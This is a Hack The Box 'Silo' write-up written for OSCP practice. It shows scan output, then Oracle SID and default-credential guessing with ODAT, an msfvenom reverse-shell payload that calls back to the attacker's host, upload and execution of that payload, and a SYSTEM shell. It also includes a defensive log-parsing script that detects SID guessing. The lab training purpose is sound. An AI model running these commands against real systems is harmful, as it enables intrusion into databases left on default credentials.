Hack The Box: Silo Write-up (#37)

Joshua Surendran
Nov 16, 2020

This is my 37th box out of 45 boxes for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

I found a new way to perform recon using an automated Nmap script called nmapAutomator. Please feel free to check it out here.

./nmapAutomator.sh 10.10.10.82 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get back the following result:

Running all scans on 10.10.10.82

Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 02:55 +08
Nmap scan report for 10.10.10.82
Host is up (0.011s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 02:55 +08
Nmap scan report for 10.10.10.82
Host is up (0.060s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-11T18:57:13
|_ start_date: 2020-09-11T18:54:54
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.61 seconds
----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 02:57 +08
Warning: 10.10.10.82 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.82
Host is up (0.079s latency).
All 1000 scanned ports on 10.10.10.82 are closed (569) or open|filtered (431)

Nmap done: 1 IP address (1 host up) scanned in 708.49 seconds



---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 03:09 +08
Initiating Parallel DNS resolution of 1 host. at 03:09
Completed Parallel DNS resolution of 1 host. at 03:09, 0.01s elapsed
Initiating SYN Stealth Scan at 03:09
Scanning 10.10.10.82 [65535 ports]
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 135/tcp on 10.10.10.82
Warning: 10.10.10.82 giving up on port because retransmission cap hit (1).
Increasing send delay for 10.10.10.82 from 0 to 5 due to 204 out of 509 dropped probes since last increase.
Discovered open port 49155/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 7.25% done; ETC: 03:16 (0:06:37 remaining)
SYN Stealth Scan Timing: About 14.64% done; ETC: 03:16 (0:06:13 remaining)
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 21.43% done; ETC: 03:16 (0:05:45 remaining)
Discovered open port 49154/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 28.24% done; ETC: 03:16 (0:05:15 remaining)
SYN Stealth Scan Timing: About 34.93% done; ETC: 03:16 (0:04:47 remaining)
SYN Stealth Scan Timing: About 41.58% done; ETC: 03:16 (0:04:19 remaining)
SYN Stealth Scan Timing: About 48.28% done; ETC: 03:16 (0:03:49 remaining)
Discovered open port 49161/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 54.98% done; ETC: 03:16 (0:03:20 remaining)
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 61.73% done; ETC: 03:16 (0:02:50 remaining)
SYN Stealth Scan Timing: About 68.52% done; ETC: 03:16 (0:02:20 remaining)
Discovered open port 49160/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 75.24% done; ETC: 03:16 (0:01:50 remaining)
SYN Stealth Scan Timing: About 81.84% done; ETC: 03:16 (0:01:21 remaining)
SYN Stealth Scan Timing: About 86.69% done; ETC: 03:53 (0:05:51 remaining)
Discovered open port 47001/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 92.57% done; ETC: 03:50 (0:03:06 remaining)
Discovered open port 1521/tcp on 10.10.10.82
Discovered open port 49159/tcp on 10.10.10.82
Completed SYN Stealth Scan at 03:48, 2387.10s elapsed (65535 total ports)
Nmap scan report for 10.10.10.82
Host is up (0.014s latency).
Not shown: 65427 closed ports, 93 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2387.20 seconds
Raw packets sent: 79865 (3.514MB) | Rcvd: 79253 (3.170MB)
Making a script scan on extra ports: 5985, 47001, 49161, 49162

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 03:48 +08
Nmap scan report for 10.10.10.82
Host is up (0.0075s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.25 seconds
---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 03:49 +08
Nmap scan report for 10.10.10.82
Host is up (0.011s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS Listener (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open unknown
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.18 seconds
Running Vuln scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 03:52 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.82
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49160/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49161/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49162/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 679.25 seconds
---------------------Recon Recommendations----------------------
Web Servers Recon:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.aspx,.php -u http://10.10.10.82:80 -o recon/gobuster_10.10.10.82_80.txt
nikto -host 10.10.10.82:80 | tee recon/nikto_10.10.10.82_80.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.82:5985 -o recon/gobuster_10.10.10.82_5985.txt
nikto -host 10.10.10.82:5985 | tee recon/nikto_10.10.10.82_5985.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.82:47001 -o recon/gobuster_10.10.10.82_47001.txt
nikto -host 10.10.10.82:47001 | tee recon/nikto_10.10.10.82_47001.txt
SMB Recon:

smbmap -H 10.10.10.82 | tee recon/smbmap_10.10.10.82.txt
smbclient -L "//10.10.10.82/" -U "guest"% | tee recon/smbclient_10.10.10.82.txt
nmap -Pn -p445 --script vuln -oN recon/SMB_vulns_10.10.10.82.txt 10.10.10.82
Oracle Recon "Exc. from Default":

cd /opt/odat/;#10.10.10.82;
./odat.py sidguesser -s 10.10.10.82 -p 1521
./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/accounts-multiple.txt
cd -;#10.10.10.82;
Which commands would you like to run?
All (Default), gobuster, nikto, nmap, odat, smbclient, smbmap, Skip <!>
Running Default in (1) s:
---------------------Running Recon Commands----------------------
Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.82:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,asp,aspx,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 04:03:56 Starting gobuster
===============================================================
http://10.10.10.82:80/aspnet_client (Status: 301) [Size: 159]
===============================================================
2020/09/12 04:04:35 Finished
===============================================================
Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.82
+ Target Hostname: 10.10.10.82
+ Target Port: 80
+ Start Time: 2020-09-12 04:04:35 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/8.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 4.0.30319
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-09-12 04:07:37 (GMT8) (182 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan

=========================

Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.82:5985
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 04:07:37 Starting gobuster
===============================================================
===============================================================
2020/09/12 04:07:46 Finished
===============================================================
Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.82
+ Target Hostname: 10.10.10.82
+ Target Port: 5985
+ Start Time: 2020-09-12 04:07:47 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7864 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2020-09-12 04:10:08 (GMT8) (141 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan

=========================

Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.82:47001
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: php,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 04:10:08 Starting gobuster
===============================================================
===============================================================
2020/09/12 04:10:18 Finished
===============================================================
Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.82
+ Target Hostname: 10.10.10.82
+ Target Port: 47001
+ Start Time: 2020-09-12 04:10:19 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7864 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2020-09-12 04:12:40 (GMT8) (141 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan

=========================

Starting smbmap scan

[!] Authentication error on 10.10.10.82
Finished smbmap scan

=========================

Starting smbclient scan

session setup failed: NT_STATUS_ACCOUNT_DISABLED
Finished smbclient scan

=========================

Starting nmap scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 04:12 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.82
Host is up (0.0076s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try
Nmap done: 1 IP address (1 host up) scanned in 48.35 seconds
Finished nmap scan

=========================

Starting odat scan

/htb/Silo
Finished odat scan

=========================

---------------------Finished all Nmap scans---------------------
Completed in 1 hour(s), 18 minute(s) and 30 second(s)

  • Port 80: running an HTTP service, Microsoft IIS httpd 8.5.
  • Ports 135, 49152, 49153, 49154, 49155, 49160, 49161 and 49162: running the msrpc service.
  • Ports 139 and 445: running the SMB service.
  • Ports 1521 and 49159: running oracle-tns, Oracle TNS listener 11.2.0.2.0.
  • Ports 5985 and 47001: running an HTTP service, Microsoft HTTP API httpd 2.0.

We have a total of 15 open ports. Before we begin enumeration, let’s make a quick mental note.

  1. Port 80 is running Microsoft IIS 8.5. This version is associated with Windows Server 2012 R2. You can check here. The Gobuster and Nikto scans didn't find anything useful on the web server.
  2. SMB access is not allowed, as the error message states “NT_STATUS_ACCOUNT_DISABLED”.
  3. Ports 1521 and 49159 are running the Oracle TNS listener. The listener is the server process that provides basic network connectivity for clients, application servers, and other databases to an Oracle database. The nmapAutomator results show it tried ODAT (Oracle Database Attacking Tool) to recon this service, but it failed since I don't have this tool on my Kali Linux. We will do manual enumeration for this service. Based on the ODAT usage description, if we are able to get a valid SID (a name that uniquely identifies the instance/database) and credentials, we will be able to perform code execution.

Service Enumeration

Install ODAT by following the instructions here. Then run the following command from the ODAT installation directory to find a valid SID.

python3 odat.py sidguesser --sids-file /usr/share/odat/sids.txt -s 10.10.10.82 -p 1521

We have 2 valid SIDs. We’ll use XE.
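A defender's view of the SID-guessing step above, as an added example (not from the original post or from ODAT): it scans Oracle listener log records for a single client that is refused many distinct SIDs with TNS-12505. The log lines are constructed, the record layout is assumed to follow the usual listener.log "establish" format, and the helper names and threshold are hypothetical.

```python
import re
from collections import defaultdict

# Assumed listener.log "establish" record layout:
# timestamp * connect data * client address * establish * SID * return code
ESTABLISH = re.compile(
    r"^\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2} \* "
    # Use the ADDRESS host (peer seen by the listener), not the
    # client-supplied HOST inside CONNECT_DATA, which can be spoofed.
    r".*?\(ADDRESS=\(PROTOCOL=tcp\)\(HOST=(?P<src>[^)]+)\)\(PORT=\d+\)\) \* "
    r"establish \* (?P<sid>\S+) \* (?P<rc>\d+)\s*$"
)
UNKNOWN_SID = 12505  # TNS-12505: listener does not know the SID


def _rec(ts, src, sid, rc):
    """Build one constructed log record (sample data, not a real capture)."""
    return (f"12-SEP-2020 {ts} * (CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)"
            f"(HOST=client)(USER=user))) * (ADDRESS=(PROTOCOL=tcp)"
            f"(HOST={src})(PORT=50000)) * establish * {sid} * {rc}")


TNS_LINE = ("TNS-12505: TNS:listener does not currently know of SID "
            "given in connect descriptor")

# Constructed sample: a normal client, a misconfigured client retrying
# one wrong SID, and a client walking through a list of SIDs.
SAMPLE_LOG = "\n".join([
    _rec("04:20:01", "192.0.2.10", "XE", 0),
    _rec("04:20:05", "192.0.2.20", "OLDDB", 12505), TNS_LINE,
    _rec("04:20:06", "192.0.2.20", "OLDDB", 12505), TNS_LINE,
    _rec("04:20:07", "192.0.2.20", "OLDDB", 12505), TNS_LINE,
    _rec("04:20:08", "192.0.2.20", "OLDDB", 12505), TNS_LINE,
    _rec("04:21:10", "192.0.2.99", "ORCL", 12505), TNS_LINE,
    _rec("04:21:10", "192.0.2.99", "PROD", 12505), TNS_LINE,
    _rec("04:21:11", "192.0.2.99", "TEST", 12505), TNS_LINE,
    _rec("04:21:11", "192.0.2.99", "XE", 0),
])


def find_sid_guessing(log_text, threshold=3):
    """Return sources refused at least `threshold` distinct SIDs."""
    rejected = defaultdict(set)  # source -> SIDs refused with 12505
    accepted = defaultdict(set)  # source -> SIDs the listener accepted
    for line in log_text.splitlines():
        m = ESTABLISH.match(line)
        if not m:
            continue  # TNS-xxxxx continuation lines and other records
        sid, rc = m["sid"].upper(), int(m["rc"])
        if rc == UNKNOWN_SID:
            rejected[m["src"]].add(sid)
        elif rc == 0:
            accepted[m["src"]].add(sid)
    # Distinct SIDs, not raw failures: a client retrying one stale SID
    # is a misconfiguration, many different SIDs is enumeration.
    return [
        {"source": src,
         "rejected_sids": sorted(sids),
         "accepted_sids": sorted(accepted.get(src, set()))}
        for src, sids in rejected.items() if len(sids) >= threshold
    ]


if __name__ == "__main__":
    for finding in find_sid_guessing(SAMPLE_LOG):
        print(finding)
```

A non-empty accepted_sids list on a flagged source means the enumeration found a live instance, which is the point at which credential guessing usually follows.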

Next, ODAT has a passwordguesser module that guesses database credentials using the discovered SID and default password lists (that come with the ODAT installation). So run the following command.

python3 odat.py passwordguesser -d XE -s 10.10.10.82 -p 1521

We get back the following results.

ODAT has found valid credentials. According to Oracle documentation, these credentials are Oracle’s default credentials. Now that we have a valid SID and credentials, we can move to the next phase to get access to the target.

Exploitation

ODAT has a file upload feature called utlfile. We’ll use this to upload a reverse shell payload to the target, then call the payload using another module, externaltable. Let’s begin.

Generate a reverse shell payload using MSFVenom.

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exe

Upload the payload to the target’s /temp directory.

python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --putFile \temp shell.exe /htb/Silo/shell.exe

Payload successfully uploaded.

Set up a Netcat listener on your Kali Linux.

nc -nlvp 53

Next, run the following command to execute the payload.

python3 odat.py externaltable -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --exec /temp shell.exe

Check back on the listener.

We get a SYSTEM shell! The database must have been running with SYSTEM privileges, and that is the reason we get SYSTEM.

Grab the user flag.

Grab the root flag.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Bounty.
